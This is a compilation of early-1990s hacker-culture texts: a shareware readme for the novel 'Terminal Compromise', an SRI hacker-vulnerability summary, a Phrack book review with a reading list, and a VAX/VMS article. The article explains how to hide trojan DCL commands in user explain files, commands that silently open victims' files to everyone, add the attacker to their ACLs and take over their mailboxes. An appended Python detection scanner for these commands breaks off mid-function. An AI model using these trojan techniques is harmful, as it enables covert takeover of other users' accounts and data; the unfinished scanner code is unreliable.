" . . . chilling scenarios . . . ", "For light summer reading with weighty implications . . . ", " . . . thought provoking, sometimes chilling . . . "

Remember, it's only fiction. Or is it?

TERMINAL COMPROMISE: SYNOPSIS

"It's all about the information . . . the information."
From "Sneakers"

Taki Homosoto, silver haired Chairman of Japan's huge OSO Industries, survived Hiroshima; his family didn't. Homosoto promises revenge against the United States before he dies. His passionate, almost obsessive hatred of everything American finally comes to a head when he acts upon his desires. With unlimited resources, he comes up with the ultimate way to strike back at the enemy.

Miles Foster, a brilliant 33 year old mathematician apparently isn't exactly fond of America either. The National Security Agency wanted his skills, but his background and "family" connections kept him from advancing within the intelligence community. His insatiable - borderline psychotic - sex drive balances the intensity of waging war against his own country to the highest bidder.

Scott Mason, made his fortune selling high tech toys to the Pentagon. Now as a New York City Times reporter, Mason understands both the good and the evil of technology and discovers pieces of the terrible plot which is designed to destroy the economy of the United States.
Tyrone Duncan, a physically huge 50-ish black senior FBI agent who suffered through the Hoover Age indignities, befriends Scott Mason. Tyrone provides the inside government track and confusion from competing agencies to deal with the threats. His altruistic and somewhat pure innate view of the world finally makes him do the right thing.

As Homosoto's plan evolves, Arab zealots, German intelligence agents and a host of technical mercenaries find the weaknesses in our techno-economic infrastructure. Victims find themselves under attack by unseen adversaries; Wall Street suffers debilitating blows; Ford and Chrysler endure massive shut downs. The U.S. economy suffers a series of crushing blows.

From the White House to the Pentagon to the CIA to the National Security Agency and FBI, a complex weaving of fascinating political characters find themselves enmeshed in a battle of the New World Order. Sex, drugs, rock'n'roll: Tokyo, Vienna, Paris, Iraq, Iran. It's all here.

Enjoy reading "Terminal Compromise."

SHAREWARE - NOVEL FEES:

We hope that you enjoy "Terminal Compromise" as much as everyone else has, and that you will send us a few shekels according to the following guidelines. The NOVEL-ON-THE-NET SHAREWARE(tm) fees for us as a publishing company are no different than the fees for software application shareware publishers, and the intent is the same. So please, let us continue this form of publishing in the future.

NOVEL-ON-THE-NET SHAREWARE Fees For The People:

The suggested donation for individuals is $7. If you hate Terminal Compromise after reading it, then only send $6.50. If you're really, really broke, then tell a hundred other people how great it was, send us a rave review and post it where you think others will enjoy reading it, too. If you're only a little broke, send a few dollars. After all, this is how we stay in business. With each registration, we will also send a FREE!
issue of "Security Insider Report," a monthly security newsletter also published by Inter.Pact Press.

NOVEL-ON-THE-NET SHAREWARE Fees For Businesses:

We hope that you put "Terminal Compromise" on your internal networks so that your employees will have the chance to enjoy it as well. It's a great way to increase security awareness amongst this country's 50,000,000 rank and file computer users. Plus, it's a hell of a good read.

One company plans on releasing a chapter every few days throughout its E-Mail system as a combination of security awareness and employee 'perc'. Try it; it works and your employees will appreciate it. Why? Because they'll all talk about it - bringing security awareness to the forefront of discussion.

FEES

Distribution for up to 100 people on a single network: $ 500
(Includes 1 Year subscription to "Security Insider Report.")

Distribution for up to 1000 people on a single network: $ 3000
(Includes 10 1 Year subscriptions to "Security Insider Report.")

Distribution for up to 2500 people on a single network: $ 6250
(Includes 1 Year electronic Corporate site license to "Security Insider Report.")

Distribution for up to 5000 people on a single network: $ 10000
(Includes 1 Year electronic Corporate site license to "Security Insider Report.")

Distribution for up to 10000 people on a single network: $ 15000
(Includes 1 Year electronic Corporate site license to "Security Insider Report.")

Distribution for up to 25000 people on a single network: $ 25000
(Includes 1 Year electronic Corporate site license to "Security Insider Report.")

Distribution for more than that - Please call and we'll figure it out.

Would you like us to coordinate a special distribution program for you? Would you like in Postscript or other visual formats? Give us a call and we'll see what we can do.

* * * * * * * * * *
Please DO NOT UPLOAD AND DISTRIBUTE "Terminal Compromise" into your networks unless you intend on paying the recommended fees.
* * * * * * * * * *

NOVEL-ON-THE-NET SHAREWARE Fees for Universities: FREE!

"Terminal Compromise" has been used by many schools and universities as a teaching supplement. Recognized Educational institutions are entitled to use "Terminal Compromise" at NO COST, as long as you register with us that you are doing so. Please provide: School name, address, etc., the course, the instructor, and the reason for using it. Also, we'd like to hear from you and tell us how it went. Thanks.

SHAREWARE-NOVEL Fees for Local, State and Federal Governments.

You have the money. :-) Please send some back by following the same fee guidelines as those for businesses.

Government employees: You are The People - same fees are appreciated.

* * * * * * * * * *
Agencies: Do not upload and distribute "Terminal Compromise" unless you plan on paying the fees.
* * * * * * * * * * *

NOVEL-ON-THE-NET SHAREWARE Fees for the International Community

Make payments in $US, please.

GETTING TERMINAL COMPROMISE:

You can get your copy of Terminal Compromise from a lot of sites; if you don't see it, just ask around. Currently the novel is archived at the following sites:

ftp.netsys.com /pub/novel
wuarchive.wustl.edu /doc/misc
soda.berkeley.edu /pub/novel

It consists of either 2 or 5 files, depending upon how you receive it. (Details at end of this file.)

Feel free to post all five files of "Terminal Compromise" anywhere on the net or on public or private BBS's as long as this file accompanies it as well.

Please forward all NOVEL-ON-THE-NET SHAREWARE fees to:

INTER.PACT PRESS
11511 Pine St. N.
Seminole, FL., 34642

Communications:
Phn: 813-393-6600
Fax: 813-393-6361
E-Mail: p00506@psi.com
wschwartau@mcimail.com

We will accept checks, money orders, and cash if you must, and we mean if you must. It's not the smartest thing in the world to send cash through the mail. We are NOT equipped at this point for credit cards.
Remember, "Terminal Compromise" is copyrighted, and we will vigorously pursue violations of that copyright. (Lawyers made us say it again.)

If you ABSOLUTELY LOVE "Terminal Compromise," or find that after 50 pages of On-Screen reading, you may want a hard copy for your bookshelf. It is available from bookstores nationwide for $19.95, or from Inter.Pact directly for $19.95 + $3.50 shipping and handling. If you first paid the $ 7 NOVEL-ON-THE-NET SHAREWARE fee, send in proof and we'll deduct $ 7 from the price of the hard copy edition.

ISBN: 0-962-87000-5

Enjoy "Terminal Compromise" and help us make it an easy decision to put more books on the Global Network.

Thank you in advance for your attention and your consideration.

The Publishers, INTER.PACT Press

READING "TERMINAL COMPROMISE"

"Terminal Compromise" will come to you in one of two ways:

1) Original Distribution Format From Inter.Pact Press contains only two -2- files.

TC_READ.ME 13,927 Bytes
That is this file you are now reading and gives an overview of "Terminal Compromise" and how NOVEL-ON-THE-NET Shareware works.

TERMCOMP.ZIP 605,821 Bytes
This is the total content of "Terminal Compromise". Run PKUNZIP to expand the file into four -4- readable ASCII files.

2) Some locations may choose to post "Terminal Compromise" in readable ASCII form. There will then be four files in addition to the TC_READ.ME file.

TERMCOMP.1 250,213 Bytes contains the Introduction and Chapters 1 through 5.
TERMCOMP.2 337,257 Bytes contains Chapters 6 through 14.
TERMCOMP.3 363,615 Bytes contains Chapters 15 through 21.
TERMCOMP.4 388,515 Bytes contains Chapters 22 through 30 and the Epilogue.

Enjoy "Terminal Compromise!" and pass it on to whomever you think would enjoy it, too!

Thank You!

****************************************************************************

THE STATE OF SECURITY IN CYBERSPACE

SRI International conducted a worldwide study in 1992 of a broad range of security issues in "cyberspace."
In brief, cyberspace is the full set of public and private communications networks in the United States and elsewhere, including telephone or public switched telephone networks (PSTNs), packet data networks (PDNs) of various kinds, pure computer networks, including the Internet, and wireless communications systems, such as the cellular telephone system. We did not address security vulnerabilities associated with classified, secure communications networks used by and for governments.

The study was conducted as part of our ongoing research into the vulnerabilities of various software components of cyberspace. Our approach was to conduct research through field interviews with a broad range of experts, including people we characterize as "good hackers," about security issues and vulnerabilities of cyberspace and the activities of the international "malicious hacker" community.

While the specific results of the study are proprietary to SRI, this brief report summarizes our general conclusions for the many individuals who kindly participated in our field interviews. As we indicated during our field interviews, the original research for this project was not part of any other kind of investigation, and we have not revealed the identity of any of our respondents.

The study aimed to understand "malicious hackers," that is, people who have and use the technical knowledge, capability, and motivation to gain unauthorized access, for various reasons, to systems in cyberspace. It is important to understand that by no means all hackers are malicious nor does most hacking involve unauthorized access to cyberspace systems; indeed, only a small fraction of computer hacking involves such activities but gives hacking an otherwise undeserved bad reputation. While we attempted to focus on technical (software) vulnerabilities, our interviews led us to look more at the broader motivations and different approaches to cracking into various networks and networked systems.
MAIN CONCLUSIONS

Our main conclusion is that social, organizational, and technological factors still combine in ways that make much of cyberspace relatively vulnerable to unauthorized access. The degree of vulnerability varies from one type of communications system to another. In general, the PSTN is the least vulnerable system, the PDNs are somewhat more vulnerable than the PSTN, the Internet is relatively insecure, and as is widely known, the cellular phone system is the most vulnerable of the four major areas we addressed.

The main vulnerabilities in most communications networks involve procedural, administrative, and human weaknesses, rather than purely technical vulnerabilities of network management, control systems, and hardware, and software. There are technical vulnerabilities--poor system design and specific security flaws in software--but they are mainly exploitable because of the above problems.

Highlights of the study's conclusions include:

o Malicious attacks on most networks and networked systems cannot be completely prevented, now or in the future. More than enough information is publicly available to hackers and other technically-literate people to preclude attempts at prevention of intrusions.

o It is possible individuals or groups could bring down individual systems or related groups of systems, on purpose or by accident. However, security is generally improving as a result of dealing with past threats and challenges to system security. For instance, responses to the most recent serious threat to the Internet, the so-called Internet Worm in 1989, included improved security at sites vulnerable to this sort of worm.

o We found no evidence that the current generation of U.S. hackers is attempting to sabotage entire networks. On the contrary, doing so is inconsistent with the stated ethics and values of the hacker community, which are to explore cyberspace as a purely intellectual exercise without malicious intent or behavior.
Some individuals who operate outside this informal ethical framework, however, can and do damage specific systems and occasionally use systems for personal gain or vindictive activities.

o There is some evidence that the newest generations of hackers may be more motivated by personal gain than the traditional ethic of sheer curiosity. This development could mean that networks and networked systems could become more likely targets for attacks by hardened criminals or governments' intelligence services or their contractors (i.e., employing malicious hackers). This threat does not appear to be significant today but is a possible future scenario.

o The four major areas of vulnerability uncovered in our research have little or nothing to do with specific software vulnerabilities per se. They relate more to the ways in which hackers can gain critical information they need in order to exploit vulnerabilities that exist because of poor systems administration and maintenance, unpatched "holes" in networks and systems, and so on.

  - The susceptibility of employees of businesses, public organizations, schools, and other institutions to "social engineering" techniques
  - Lax physical and procedural controls
  - The widespread availability of non-proprietary and of sensitive and proprietary information on paper about networks and computer systems
  - The existence of "moles," employees of communications and computer firms and their suppliers who knowingly provide proprietary information to hackers.

o The vulnerabilities caused by shortcomings in software-based access controls and in hardware-related issues constitute significantly lower levels of risk than do the four areas discussed above on more secure networks such as the PSTN and PDNs. However, on the Internet and similar systems, software-based access controls (for instance, password systems) constitute significant problems because of often poor system maintenance and other procedural flaws.
RECOMMENDATIONS

Based on our research, we recommend the following:

1. Protection of organizational information and communications assets should be improved. Issues here range from those involving overall security systems to training employees and customers about maintenance of security on individual systems, handling and disposition of sensitive printed information, and dealing with "social engineering."

2. Techniques used to protect physical assets should be improved. For example, doors and gates should be locked properly and sensitive documents and equipment guarded appropriately.

3. Organizations and their employees should be made aware of the existence and role of moles in facilitating and enabling hacker intrusions, and care taken in hiring and motivating employees with the mole problem in mind.

4. Software- and hardware-based vulnerabilities should also be addressed as a matter of course in systems design, installation and maintenance.

5. Organizations concerned with information and communications security should proactively promote educational programs for students and parents about appropriate computer and communications use, personal integrity and ethics, and legitimate career opportunities in the information industry, and reward exemplary skills, proficiency and achievements in programming and ethical hacking.

6. Laws against malicious hacking should be fairly and justly enforced.

SRI believes that the results of this study will provide useful information to both the operators and users of cyberspace, including the hacker community. We are planning to continue our research in this area during 1993 within the same framework and conditions (i.e., anonymity of all parties and organizations) as we conducted the 1992 research. We invite hackers and others who are interested in participating in this work through face-to-face, telephone or email interviews to contact one of the following members of the SRI project team:

A. J.
Bate SRI International Phone: 415 859 2206 Fax: 415 859 3154 Email: aj_bate@qm.sri.com, aj@sri.com Stuart Hauser SRI International Phone: 415 859 5755 Fax: 415 859 3154 Email: stuart_hauser@qm.sri.com Tom Mandel SRI International Phone: 415 859 2365 FAX: 415 859 7544 Email: mandel@unix.sri.com ***************************************************************************** ==Phrack Magazine== Volume Four, Issue Forty-Two, File 5 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== (cont) ****************************************************************************** `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`' '` '` `' Approaching Reality: `' '` ~~~~~~~~~~~~~~~~~~~~ '` `' A review of the new book Approaching Zero `' '` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ '` `' by Aleph One `' '` ~~~~~~~~~~~~ '` `' `' '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'` When I started to read this book, I expected to read one more of the series of books that claim to be the "definitive history of the computer underworld" and the "first book to define the technological subculture of phreaking, hacking, and virus writing". After all what does a guy that writes for GQ, The Hollywood Reporter, Variety and Time know about the computer underground? Well to my surprise the authors, Paul Mungo and Bryan Clough (a member of the Virus Strategy Group, which is coordinated by New Scotland Yard's Computer Crime Unit), did a pretty good job at presenting the facts as they are. For the first time I heard a reporter and a computer crime expert give real figures at how much computer crime has really cost. Other than a few minor technical errors and the fact that they fail to mention some people and groups (especially in the virus section), the book was enjoyable to read. 
The book covers the history of the underground starting with its beginnings in the 60's, from phreaking to the adventures of Captain Crunch and the rest of the bunch to the not so long ago Operation Sundevil and the raids all over the country on members of the LOD, MOD and DPAC. It also goes through the events that led to the German hackers spy trials, and to the new generation of virus writers that are creating the new kind of living organisms that roam cyberspace. They also discuss the gray scale that categorizes hackers, from the good hackers to the bad to the ones not that bad... those who are in it for profit and those who are in it to learn.

Hopefully all the readers of the book, hackers, security specialists, reporters and the general public will get a better understanding of what motivates hackers to do what they do by learning where they come from. To the hackers let them learn not to repeat their past errors.

I hope that the time of raids and sting operations has passed, but the late developments in the Washington 2600 meeting have pulled a shadow over my hopes. Has no one learned? Have the SS and FBI nothing better to do? Just a few months back someone pulled one of the greatest scams of all by setting up a fake ATM and stealing a few thousand dollars. These are the kind of people the authorities should be after. And to the hacker, don't sell yourself! Remember this is a learning trip, once you start forgetting to learn and start making money out of it, it is just another job, an illegal one at that.

Approaching Zero was an exciting and interesting surprise. It has given me the hint that maybe someone out there understands and I hope that everyone that reads it (and you must, you must read and learn all you can) will also understand.

I just leave you with these words: Hacking comes from the heart - sometimes in the form of an obsession, sometimes in the form of a hobby - once that dies, there is nothing left to do. No more traveling through the nets!
No more exploring new systems! You might as well turn the power off.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

What follows is a list of books, papers and articles for those that want to know a little more of how the media portrays us, and a little more about the story of hacking in general.

Books:
~~~~~~
- "Approaching Zero" by Paul Mungo & Bryan Clough. Random House 1992.
- "Beating the System" by Owen Bowcott & Sally Hamilton. London: Bloomsbury, 1990.
- "Computer Viruses - A High-Tech Disease" by Ralf Burger. Grand Rapids, MI: Abacus, 1988.
- "The Hackers' Handbook" by Hugo Cornwall. London: Century Communications, 1985.
- "Computers Under Attack" by Peter Denning. Addison Wesley, 1990.
- "Profits of Deceit" by Patricia Franklin. London: William Heinemann, 1990.
- "Cyberpunk" by Katie Hafner & John Markoff. London: Fourth Estate, 1991.
- "Out of the Inner Circle" by Bill Landreth (aka The Cracker). Redmond, WA.: Tempus Books, 1985.
- "Silicon Valley Fever" by Judith K. Larsen & Everett M. Rogers. London: George Allen & Unwin, 1985.
- "Computer Viruses" by Ralph Roberts. Greensboro, NC: Compute! Books, 1988.
- "The Cuckoo's Egg" by Clifford Stoll. New York: Doubleday, 1989.
- "Spectacular Computer Crimes" by Buck BloomBecker. Dow Jones-Irwin, 1990.
- "The New Hacker's Dictionary" by Eric Raymond. MIT Press, 1983.
- "The Hacker Crackdown" by Bruce Sterling. Bantam Books, 1992.
- "The Little Black Book of Computer Viruses" by Mark Ludwig. American Eagle Publications, 1991.
- "Artificial Life" by Steven Levy. Pantheon, 1992. (For those virus writers out there, use your talent to create life.)

Articles & Papers:
~~~~~~~~~~~~~~~~~~
- "Crime and Puzzlement" by John Perry Barlow. Whole Earth Review, Fall 1990: 44-57.
- "The Casino Virus - Gambling with Your Hard Disk" by Jim Bates. Virus Bulletin, March 1991: 15-17.
- "The TP Viruses" by Vesselin Bontchev. Postings to Virus-L 1990.
- "In Defense of Hackers" by Craig Bromberg.
The New York Times Magazine, April 21, 1991.
- "Bulgaria - The Dark Country" by Bryan Clough. Virus Bulletin, December 1990: 9-11.
- "Voice Mail Computer Abuse Prosecution: United States v. Doucette a/k/a Kyrie" by William J. Cook. Safe Computing Proceedings of the Fourth Annual Computer Virus & Security Conference, 1991, Organized by National Computing Corporation.
- "Invasion of the Data Snatchers!" by Philip Elmer-De Witt. Time, September 26, 1988: 63.
- "Data Exchange and How to Cope with This Problem: The Implication of the German KGB Computer Espionage Affair" by Hans Gliss. Paper presented at Securicom Italia, October 1989.
- "The Implications of the SPANet Hack." Computers Fraud & Security Bulletin, Vol. 10, No. 2, 1987.
- "The Brain Virus: Fact and Fantasy" by Harold J. Highland. Computers & Security, August 1988: 367-370.
- "Computer Viruses - A Post Modern." Computer & Security, April 1988: 117-184.
- "Terminal Delinquents" by Jack Hitt & Paul Tough. Esquire, December 1990.
- "The Social Organization of the Computer Underground" by Gordon R. Meyer. M.A. Thesis Submitted to the Graduate School, August 1989.
- "Satanic Viruses" by Paul Mungo. GQ, February 1991: 126-130.
- "Secrets of the Little Blue Box" by Ron Rosenbaum. Esquire, October 1971, Collected in Travels with Dr. Death. New York: Viking Penguin, 1991.
- "The Worm Program - Early Experience with a Distributed Computations" by John F. Shoch. Communications of the ACM, Vol. 25, No. 3, March 1982.
- "The Search for Den Zuk" by Fridrik Skulason. Virus Bulletin, February 1991: 6-7.
- "Crisis and Aftermath" by Eugene H. Spafford. Communications of the ACM. Vol. 32, No. 6, June 1989.
- "GURPS Labor Lost: The Cyberpunk Bust" by Bruce Sterling, Effector, September 1991: 1.
- "Stalking the Wily Hacker" by Clifford Stoll. Communications of the ACM. Vol. 31, No. 5, May 1988.
- "The Kinetics of Computer Virus Replication." by Peter S. Tippett. FundationWare, March 1990.
- "The General and Logical Theory of Automata" by John L. von Neumann. Hixon Symposium, September 1948.
- "Here Comes the Cyberpunk" by Eden Restored. Time, February 8, 1993: 58-65.
- "Surfing Off the Edge" by Richard Begar. Time, February 8, 1993: 62.
- "Can Hackers Be Sued for Damages Caused by Computer Viruses?" by Pamela Samuelson. Communications of the ACM. Vol. 32, No. 6, June 1989.
- "Viruses and Criminal Law" by Michael Gemignani. Communications of the ACM. Vol. 32, No. 6, June 1989.
- "Password Cracking: A Game of Wits" by Donn Seeley. Communications of the ACM. Vol. 32, No. 6, June 1989.
- "The Cornell Commission: On Morris and the Worm" by Ted Eisenberg, David Gries, Juris Hartmanis, Don Holcomb, M. Stuart Lynn & Thomas Santoro. Communications of the ACM. Vol. 32, No. 6, June 1989.
- "Desperately Seeking Cyberspace" by Paul Saffo. Personal Computing, May 1989: 247-248.
- "Secrets of the Software Pirates" by Bylee Gomes. Esquire, January 1982: 58-64.
- "Trouble in Cyberspace" by Willard Uncapher. The Humanist, September/October 1991: 5-14,34.
- "Is Computer Hacking a Crime?" Capture of a discussion held on the WELL. Harper's Magazine, March 1990: 45-57.
- "The United States vs. Craig Neidorf" by Dorothy E. Denning. Communications of the ACM, Vol. 34, No. 3, March 1991: 24-32.
- "Colleagues Debate Denning's Comments." Communications of the ACM. Vol. 34, No. 3, March 1991: 33-41.
- "Denning's Rebuttal" by Dorothy E. Denning. Communications of the ACM. Vol. 34, No. 3, March 1991: 42-43.
- "Coming into the Country" by John P. Barlow. Communications of the ACM. Vol. 34, No. 3, March 1991: 19-21.
- "Off the Hook" by Julian Dibbell. Village Voice, August 21, 1990: 8.
- "On Line and Out of Bounds" by Julian Dibbell. Village Voice, July 24, 1990: 27-32.
- "Hi-Tech Mall Crawl" by Julian Dibbell. Village Voice. March 1990: 12
- "Samurai Hackers" by Lynda Edwards. Rolling Stone, September 19, 1991: 67-69.
- "Crackdown on hackers `may violate civil rights'" by Dan Charles. New Scientist, July 21, 1990: 22.
- "United States v. Zod." The Economist, September 1, 1990: 23.
- "Drop the Phone." Time, January 9, 1989: 49.
- "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American, May 1984: 14-21.
- "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American, March 1985: 14-23.
- "Computer Recreations (Core War)" by A. K. Dewdney. Scientific American. March 1989: 110-113.
- "Computer Security: NAS Sounds the Alarm" by Eliot Marshall. Science, Vol. 250: 1330.
- "Students Discover Computer Threat" by Gina Koda. Science, Vol. 215, 5 March, 1982: 1216-1217.
- "A nationwide Computer-Fraud Ring Is Broken Up." The New York Times National, Sunday, April 19, 1992.
- "Hackers: Is a Cure Worse than the Disease?" by Mark Lewyn. Business Week, December 4, 1989: 37-38.
- "Computer Hacking Goes to Trial" by William F. Allman. U.S. News & World Report, January 22, 1990: 25.
- "Morris Code" by Katie Hafner. The New Republican, February 19, 1990: 15-16.
- "Hackers Intentions Key to Court Case" by David Lindley. Nature. Vol. 340, August 3, 1989: 329.
- "Problems of Security" by David Lendley. Nature. Vol. 340. July 27, 1989: 252.
- "Hostile Takeovers" by Paul Wallich. Scientific American, January 1989: 22-23.
- "The Worm's Aftermath" by Eliot Marshall. Science, Vol. 242, November 25, 1988: 1121-1122.
- "Researcher Fear Computer Virus' Will Slow Use of National Network" by Calvin Sims. The New York Times, Monday, November 14, 1998: B6.
- "Networked Computers Hit by Intelligent `Virus'" by Joseph Palca & Seth Shulman. Nature, Vol. 336, November 10, 1988: 97.
- "The Science of Computing: Computer Viruses" by Peter J. Denning. American Scientist, Vol. 76, May-June 1988: 236-238.
- "Cyberpunks and the Constitution" by Philip Elmer-Dewitt. Time, April 8, 1991: 81.
- "Plan to outlaw hacking." Nature, Vol. 341, October 19, 1989: 559.
- "Computer System Intruder Plucks Passwords and Avoids Detection" by John Markoff. The New York Times National, Monday, March 19, 1990.
- "Networked Computer Security" by S.J. Buchsbaum. Vital Speeches of the day. December 15, 1991: 150-155.
- "Halting Hackers." The Economist. October 28, 1989: 18.
- "Revenge of the Nerds" by Nocholas Martin. The Washington Monthly, January 1989: 21-24.
- "Greater awareness of security in aftermath of computer worm" by Seth Shulman & Joseph Palce. Nature, Vol. 336, November 1988: 301.
- "Avoiding Virus Hysteria" by Patrick Honan. Personal Computing, May 1989: 85-92.

*****************************************************************************

                {----------------------------------------------}
                {                                              }
                {       VMS/VAX Explain Files Explained        }
                {                      or                      }
                {      Security Holes in the VAX and DCL       }
                {                                              }
                {            By: The Arctic Knight             }
                {                                              }
                {----------------------------------------------}

VAX/VMS hacking has declined in popularity over the years due to the abundance of UNIX machines now available. It has even gotten bad press from fellow hackers. Included in this file is a security hole the size of, oh, any of the older IBM mainframes. With a little curiosity, persistence, and downright stubbornness I came across this rather obvious hole in the system. However, this hole may be so obvious that it has remained relatively hidden until now, especially since the decline of DCL users.

On most VAX systems, there is something called explain files. These are usually help files that are made up by the system operators or borrowed from somewhere to help better explain the way certain features of the system work, whether they be general VAX commands, or system-specific programs.

When you are in your account (Presumably, a fake one, as this can be tracked down if you are foolish) type:

$ explain index

and you will get a list of all the explain files on your system. Go ahead and take a look around these just to get a feel of what it looks like.
It should be a menu driven list of text files to view or programs to run(!!!). Most system operators only set this up to show various text files describing commands like mentioned above. However, DCL .com files can be run from explain files as well. Now comes the fun.

Many systems will also allow users to set up their own explain file. A really nice way to make it easy for other users to view text files or run programs that you have set for group or world access.

The first thing someone needs to do is make a file called INTRO.LKT which will contain whatever introduction text that you would like displayed before your explain file menu is displayed (i.e. you might have a description of yourself, your duties, or a funny poem, or WHATEVER YOU WANT THAT CAN BE CONTAINED IN A TEXT FILE!!!!)

You can use any editor to do this like EDT (a line editor) or TPU (a full screen editor). You will need to type something along these lines to create the file:

$set vt=100             !if using a full screen editor like TPU
$edit/tpu intro.lkt

After you are finished typing in the file, if you used TPU (A much better choice than EDT), you press to save the file. Now you must create a file called INDEX.LKI which will contain the file directories, filenames, and short descriptions of the files that you want to have displayed. You do this in the same manner as above, by entering an editor, and creating the file.

$edit/tpu index.lki

Now, in this file the lines should look like the following:

(File Directory)   (Filename)   (File Description)

                   Phrack41.txt A complete copy of Phrack 41 for your enjoyment.
User:[aknight.hack]vms.txt      A guide to hacking VMS systems.
Temp$1:[aknight.ftp]ftplist.txt A list of FTP servers in-state.

Now, to explain these three lines. The first one will look for the program in your main directory. The second line will look for the program listed after it on the device called USER and in the HACK directory within the AKNIGHT directory.
The final line will look on the device called TEMP$1 in the FTP directory within the AKNIGHT directory. Adding DCL programs will be explained in a minute, but first let's get this up and running.

Now that you have typed in the text files you want, and saved this file, you need to set the protection on your main directory and any others that need accessing like the text files to group and world access. For the above example one would want to type (assuming you are in your main directory):

$set prot=(g:re,w:re) user:[000000]aknight.dir    !This is my main directory
$set prot=(g:re,w:re) user:[aknight.hack]
$set prot=(g:re,w:re) temp$1:[000000]aknight.dir  !My second storage device
$set prot=(g:re,w:re) temp$1:[aknight.ftp]
$set prot=(g:r,w:r) phrack41.txt                  !Giving privs to read only
$set prot=(g:r,w:r) user:[aknight.hack]vms.txt
$set prot=(g:r,w:r) temp$1:[aknight.ftp]ftplist.txt

Now, if you type:

$explain aknight        ! (my username in this instance, yours normally)

You should get a print out to screen of your INTRO.LKT file and then a message along the lines of "Hit to continue". When you hit return a menu will appear very similar to the normal explain file menu except with your files listed and their descriptions which were accessed by the computer from your INDEX.LKI file. It would look like this (or something similar) in the above example.

{a print out of my INTRO.LKT file...}

Hit to continue

                                EXPLAIN AKNIGHT
================================================================================
(A) PHRACK41            T-A complete copy of Phrack 41 for your enjoyment.
(B) VMS                 T-A guide to hacking VMS systems.
(C) *EXPLAIN/USER AKNIGHT FTPLIST
                        T-A list of FTP servers in-state.
(Q) TERMINATE THIS PROGRAM
================================================================================
T = Text Display    P = Program to be run    (* = Related Information)
Choose A-C, Q, oe type HELP for assistance.

Now you have an explain file.
Pressing A-C will print those files to screen with pauses at each page if set up on your system/account to do so. I typed out number C the way I did, because when it has to access a directory other than its main one, it will usually do this. I think there is a way around this, but to be quite honest I haven't bothered figuring it out yet. When you quit, you will be dropped back off at your main prompt. The reason you need to set your protections is that even though from your account it may look like it is working, if you don't set your protections as described above, NO ONE else will be able to view it!!

Now, comes the fun part. Putting DCL .COM files into your explain file. These are put into your index just like any text file. So you could type up a program to let someone copy the public files you have in your account to their directory, or something similar. The security flaw comes in here and it is a big one. Since a user is accessing your explain file from their account, any file that they run issues commands in their account. So, one might plant a line in the middle of the above program that says something like:

$set def sys$login               !Returns them to their main directory.
$set prot=(g:rwed,w:rwed) *.*;*  !Their files are now read, write, execute,
                                 !and deleteable by anyone, including you.

Here is another idea. Say you create a text reader in DCL, to allow people to jump around in the text files you have, skip pages, etc. called TYPE.COM in your main directory. Anytime you can fool people into thinking that the computer is taking a little time to think, you can insert some major commands, i.e. when it is skipping pages, or copying files, which almost takes no time at all in reality. I STRONGLY suggest starting any program you plan to nest commands like this into with:

$set noverify

Which will make sure that the program lines don't get printed to the screen as they are running.
Another important command to know is the following which will cause the next text output from the VAX to be sent to a NULL device, so it will essentially be lost and not printed to the screen. So, if one is accessing someone's mailbox, you don't want a message appearing on screen saying that you have entered VAX/VMS mail or whatever. The command is:

$assign nl:sys$output/user

If you forget the /user it will send the output to the null device for the session, instead of just one line.

Some other things one might do would be to add yourself to someone's ACL (access control list) by typing:

$set acl/acl=(ident=[aknight],access=control) *.*;*

Now, this will give you access to all their files just as if you were the user, however if they bother to ever do a dir/prot command your username will be printed all over the screen, so one would suggest if you must do this, to use a fake account. Same with this below command:

$assign nl:sys$output/user
$mail set write aknight

The second line will give me read and write access to someone's mailbox, but once again if they bother to check their mailbox protections your username will be displayed.

In case you haven't realized this yet, this all has A LOT of potential, and what I have mentioned here is just the tip of the iceberg and really mostly small and even foolish things to do, but the fact comes down to ANYTHING the user can do in their account, YOU can do in their account if you know the right commands and have the patience to nest them into a .COM file well enough.

When you have created the .COM file and added it to the INDEX.LKI file, then you will need to set the protection of the file like so:

$set prot=(g:e,w:e) type.com     !Execution only. No read privs.

You now have a fully functional explain file that is only held down by your imagination.

Remember, malicious actions aren't the sign of a true hacker, so don't delete a user's complete directory just because you want to show off your power.
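For a sysop auditing user explain files, the following added example (not part of the original article) scans the text of a DCL command procedure for the commands this article names. The rule names, the `scan_dcl` helper and the sample procedure are constructed for illustration; the patterns cover only the spellings shown above and longer forms of the same verbs, and data lines are scanned as if they were commands.

```python
import re

# Rules derived only from the commands named in the article. Each pattern is
# applied to one logical DCL line, upper-cased, with comments removed.
RULES = [
    ("protection-opened", "SET PROTECTION grants group/world write or delete",
     re.compile(r"^SET\s+PROT\w*\s*=\s*\([^)]*\b[GW]\w*\s*:\s*[RE]*[WD]")),
    ("acl-added", "SET ACL adds an access control entry",
     re.compile(r"^SET\s+ACL\b.*/ACL\s*=")),
    ("output-hidden", "SYS$OUTPUT redirected to the null device",
     re.compile(r"^ASS\w*\s+NL:\s*SYS\$OUTPUT\b")),
    ("mail-access", "MAIL invoked to change mailbox access",
     re.compile(r"^MAIL\b.*\bSET\s+WRITE\b")),
    ("echo-off", "SET NOVERIFY (common, but hides what runs from the user)",
     re.compile(r"^SET\s+NOVE\w*")),
]


def strip_comment(line):
    """Drop a trailing DCL comment; a '!' inside a quoted string is kept."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quote = not in_quote
        elif ch == "!" and not in_quote:
            return line[:i]
    return line


def logical_lines(text):
    """Yield (first_line_number, command), joining '-' continuation lines."""
    pending, start = "", 0
    for number, raw in enumerate(text.splitlines(), 1):
        line = strip_comment(raw).strip().lstrip("$").strip()
        if not pending:
            start = number
        if line.endswith("-"):
            pending += line[:-1] + " "
            continue
        command = (pending + line).strip()
        pending = ""
        if command:
            yield start, command
    if pending.strip():
        yield start, pending.strip()


def scan_dcl(text):
    """Return [(line_number, rule_id, reason)] for every rule that matches."""
    findings = []
    for number, command in logical_lines(text):
        upper = command.upper()
        for rule_id, reason, pattern in RULES:
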